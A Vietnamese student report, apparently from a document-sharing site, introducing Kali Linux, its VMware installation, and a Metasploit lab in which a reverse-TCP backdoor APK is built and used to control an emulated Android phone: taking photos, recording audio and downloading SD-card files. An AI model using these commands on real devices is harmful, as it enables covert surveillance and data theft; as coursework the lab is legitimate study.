27
Nguyễn Hoàng Anh – lớp CNTT – ca sáng 2-4-6 Báo cáo đề tài 5: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài. Nghiên cứu Kali Linux, các cơ chế tạo mã độ trên Kali Linux để xâm nhập thẻ sd card, camera, ghi âm trên android Truyền dữ liệu trên thẻ sd card, kích hoạt camera, ghi âm trên android I. Kali-Linux Kali Linux là một hệ điều hành được xây dựng trên nhân Linux, được thiết kế để kiểm tra bảo mật, thử nghiệm xâm nhập các hệ thống máy tính. Tiền thân của Kali Linux là BackTrack, xuất hiện năm 2006 và được các chuyên gia đánh giá bảo mật ưa chuộng sử dụng. Sau 7 năm liên tục phát triển, tháng 3 năm 2013, hãng Offensive Security đã công bố phiên bản mới của BackTrack có thên là Kali Linux (được xem như phiên bản BackTrack 6). Kali Linux tập hợp và phân loại gần như tất cả các công cụ thiết yếu mà bất kì chuyên gia đánh giá bảo mật nào cũng cần sử dụng khi tác nghiệp. Nói về ưu điểm của Kali là nói về những thay đổi giữa BackTrack và Kali . So với BackTrack, Kali có rất nhiều cải tiến:

Báo cáo đề tài 5

Embed Size (px)

Citation preview

Page 1: Báo cáo đề tài 5

Nguyễn Hoàng Anh – lớp CNTT – ca sáng 2-4-6

Báo cáo đề tài 5: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài.

Nghiên cứu Kali Linux, các cơ chế tạo mã độ trên Kali Linux để xâm nhập thẻ sd card, camera, ghi âm trên android

Truyền dữ liệu trên thẻ sd card, kích hoạt camera, ghi âm trên android

I. Kali-Linux

Kali Linux là một hệ điều hành được xây dựng trên nhân Linux, được thiết kế để kiểm tra bảo mật, thử nghiệm xâm nhập các hệ thống máy tính. Tiền thân của Kali Linux là BackTrack, xuất hiện năm 2006 và được các chuyên gia đánh giá bảo mật ưa chuộng sử dụng. Sau 7 năm liên tục phát triển, tháng 3 năm 2013, hãng Offensive Security đã công bố phiên bản mới của BackTrack có thên là Kali Linux (được xem như phiên bản BackTrack 6). Kali Linux tập hợp và phân loại gần như tất cả các công cụ thiết yếu mà bất kì chuyên gia đánh giá bảo mật nào cũng cần sử dụng khi tác nghiệp.

Nói về ưu điểm của Kali là nói về những thay đổi giữa BackTrack và Kali. So với BackTrack, Kali có rất nhiều cải tiến:

Kali phát triển trên nền tảng hệ điều hành Debian

Điều này có nghĩa Kali có rất nhiều ưu điểm. Đầu tiên là các Repository (Kho lưu

trữ phần mềm) được đồng bộ hóa với các Repository của Debian nên có thể dễ

dàng có được các bản cập nhật vá lỗi bảo mật mới nhất và các cập nhật Repository.

Duy trì cập nhật (up-to-date) đối với các công cụ Penetration Test là một yêu cầu

vô cùng quan trọng.

Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản lý gói

của Debian. Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng về mặt

Page 2: Báo cáo đề tài 5

cấu trúc hệ thống tổng thể, nó cũng giúp cho chúng ta có thể dễ dàng hơn trong

việc xem xét hoặc thay đổi mã nguồn của các công cụ.

Tính tương thích kiến trúc

Một ưu điểm quan trọng trong Kali là nó đã cải tiến khả năng tương thích với kiến

trúc ARM. Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo ra. Giờ

đây ta có thể build Kali trên một Raspberry Pi hoặc trên Samsung Galaxy Note.

Hỗ trợ mạng không dây tốt hơn

Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều nhất, chính

là sự hỗ trợ cho một số lượng lớn phần cứng bên trong các thiết bị mạng không dây

hay USB Dongles. Một yêu cầu quan trọng khi các chuyên gia bảo mật thực hiện

đánh giá mạng không dây.

Khả năng tùy biến cao

Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống. Đối

với giao diện, giờ đây người dùng đã có thể chọn cho mình nhiều loại Desktops

như GNOME, KDE hoặc XFCE tùy theo sở thích và thói quen sử dụng.

Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai

Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì hệ điều

hành Kali. Với BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố thì

chúng ta đều phải cài lại mới hoàn toàn (Ngoại trừ phiên bản R2 lên R3 năm

ngoái).

Page 3: Báo cáo đề tài 5

Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành Debian, Kali

đã dễ dàng hơn trong việc âng cấp hệ thống khi phiên bản mới xuất hiện, người

dùng không phải cài lại mới hoàn toàn nữaII. Cài đặt Kali Linux trên máy ảo VMware

Trước tiên cần tải về file ISO phiên bản mới nhất của Kali Linux trên link dưới, bài này ta sẽ tiến hành cài phiên bản Kali Linux 1.0.6 64 bit. http://www.kali.org/downloads/

Tất nhiên ta cần phải có Vmware, việc tải và cài đặt Vmware rất dễ dàng, ta có thể tìm trên mạng. Sau khi có file ISO ta bắt đầu tiến hành cài đặt lên máy ảo.

Mở VMware, chọn File ở góc phải trên màn hình, chọn New Virtual Machine... . Trên cửa sổ mới mở, chọn custom và nhấn next

Page 4: Báo cáo đề tài 5

Tiếp tục nhấn next đến khi yêu cầu chọn file ISO thì ta chọn ISO của kali đã tải trước đó:

Đặt tên và đặt đường dẫn cho máy ảo

Page 5: Báo cáo đề tài 5

Tiếp tục chọn cấu hình cho máy ảo, ta có thể để mặc định.

Máy ảo sẽ khởi động và vào giao diện cài đặt, chọn Graphic Install

Bấm chọn ngôn ngữ, địa điểm, Host name như khi cài đặt hệ điều hành bình thường...

Page 6: Báo cáo đề tài 5

Tiếp theo chọn Root password, luôn nhớ Root password đã chọn!

Phần Partition chọn Guided – use entire disk và All files in one partition

Page 7: Báo cáo đề tài 5

Chọn Finish partitioning and write changes to disk

Chọn Yes

Page 8: Báo cáo đề tài 5

Nhấn continue để bắt đầu cài đặt khoảng 15 phút.

Page 9: Báo cáo đề tài 5

Sau khi cài đặt xong, chọn No ở Network mirror, chọn Yes ở phần Boot-loader.

Page 10: Báo cáo đề tài 5

Sau khi hoàn tất phần cuối và khởi động lại, đến giao diện login ta nhập user là root và password đã đặt ở phần trước.

Vậy là ta đã hoàn tất cài đặt kali linux trên Vmware

Page 11: Báo cáo đề tài 5

III. Tạo mã độc trên Kali Linux để xâm nhập Android

Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi máy android tải về và mở payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử dụng máy ảo Kali Linux bằng Vmware, ta nên thiết lập phần Network như sau:

Bấm vào VM -> Settings... ở thanh lựa chọn của Vmware

Bấm vào Network Adapter và chọn Bridged: connection directly to the physical network

Page 12: Báo cáo đề tài 5

Bấm vào Edit -> Virtual Network Editor...

Trên phần Bridge (connect VMs directly to the external network) chọn adapter của máy thật

Page 13: Báo cáo đề tài 5

Sau đây ta vào phần chính tạo backdoor và xâm nhập điều khiển android

Đầu tiên mở terminal và gõ dòng lệnh

Msfpayload android/meterpreter/reverse_tcp lhost=192.168.0.104 lport=8080 R > /root/Desktop/files.apk

192.168.0.104là địa chỉ IP của máy Kali, ta có thể sử dụng lệnh ifconfig để xem IP của máy Kali

Page 14: Báo cáo đề tài 5

8080 là số port, có thể chọn port khác, không nên chọn các port thường sử dụng (well knowm port : 0 -> 1023).

Lệnh trên sẽ tạo ra 1 file files.apk trên desktop của Kali, đây chính là một Metasploit reverse tcp backdoor.

Tiếp theo, gõ lệnh msfconsole

Page 15: Báo cáo đề tài 5

Sau khi msfconsile load xong, ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõ lệnh sau:

use exploit/multi/handler

set payload /meterpreter/reverse_tcp

set lhost 192.168.0.104 – nhập địa chỉ IP giống với khi tạo payload ở trên.

set port 8080 – nhập port giống với port khi tạo payload ở trên.

Exploit

Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.

Page 16: Báo cáo đề tài 5

Thử với một máy Galaxy nexus giả lập, tải về files.apk, cài đặt và mở lên được giao diện như dưới, nhấp vào nút reverse_tcp:

Page 17: Báo cáo đề tài 5

Vậy là ta đã kết nối thành công tới máy Android này, ở msfconsole sẽ như sau:

Để xem thông tin về máy, nhập lệnh SysInfo

Sử dụng camera:Để xem danh sách camera, nhập webcam_list

Page 18: Báo cáo đề tài 5

Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở danh sách camera ở phần trước. Ví dụ như sau:

File hình đã chụp từ camera của máy android là FrumITki.jpeg được lưu ở /root của máy

Page 19: Báo cáo đề tài 5

Ghi âm

Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy

Lấy file từ sd cardĐể vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục

Page 20: Báo cáo đề tài 5

Ví dụ ở đây, ta tải file App.apk trong thư mục download của sdcard

Page 21: Báo cáo đề tài 5

Dùng lệnh cd /sdcard/Download để vào thư mục

Như trên hình, ta thấy 1 file là App.apk, để tải về máy, ta nhập lệnh

Download App.apk

Và file này sẽ được tải về thư mục root của máy Kali

Page 22: Báo cáo đề tài 5

Ngoài ra, để xem danh sách các lệnh, gõ help.

IV. Tổng kết

Như vậy, ta đã tìm hiểu về Kali Linux, các cải tiến của nó so với BackTrack. Cách sử dụng Metasploit của Kali Linux để xâm nhập và điều khiển, truyền dữ liệu từ máy android về máy.

Sau khi thử nghiệm cách tấn công này, ta rút ra không nên tải về và chạy file lạ trên máy android để bảo đảm không cài nhầm backdoor như đã thấy ở trên, chỉ cần máy bị nhiễm backdoor là ta đã có thể xem như có toàn quyền kiểm soát máy android đó.